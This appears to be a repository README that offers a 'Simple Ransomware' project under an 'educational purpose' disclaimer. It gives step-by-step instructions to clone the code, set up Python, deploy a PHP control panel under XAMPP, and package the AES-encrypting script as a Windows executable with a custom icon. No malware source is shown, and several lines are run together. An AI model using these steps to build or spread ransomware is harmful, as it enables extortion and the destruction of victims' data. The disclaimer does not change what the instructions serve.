THIS IS FOR EDUCATIONAL PURPOSE, YOU CAN CLONE THIS FOR SCHOOL PROJECT OR DOING RESEARCH ON YOUR OWN, DO NOT USE THIS TO HURT PEOPLE!!! I WILL NOT RESPONSIBLE FOR YOUR ACTION!
Let's create an Ransomware that's able to hi-jack the victim computer! We'll be using Advanced Encryption Standard AES algorithm to do this.
https://deepwiki.com/DogguG/Simple-Ransomware-**First, clone this repository (make sure you already install gitbash) **
git clone https://github.com/DogguG/Simple-Ransomware-https://git-scm.com/downloadsNext install Python version 3.12.4
https://www.python.org/ftp/python/3.12.4/python-3.12.4-amd64.exeNext, create a virtual environment
Active Virtual Environment using below command.
.\.venv\Scripts\activateMake sure you activate the environment.
Finally, Deploy PHP Web Control Center
XAAMP Download and install https://www.apachefriends.org/.
Copy php web code into this folder and C:\xampp\htdocs and run Apache with SQL server to deploy.
Finally, convert to exe The command below is for install auto-py-to-exe.
pip install auto-py-to-exeChoose rans.py and icon from img folder.
Select folder contain img and .venv.
Select transfer .py to .exe.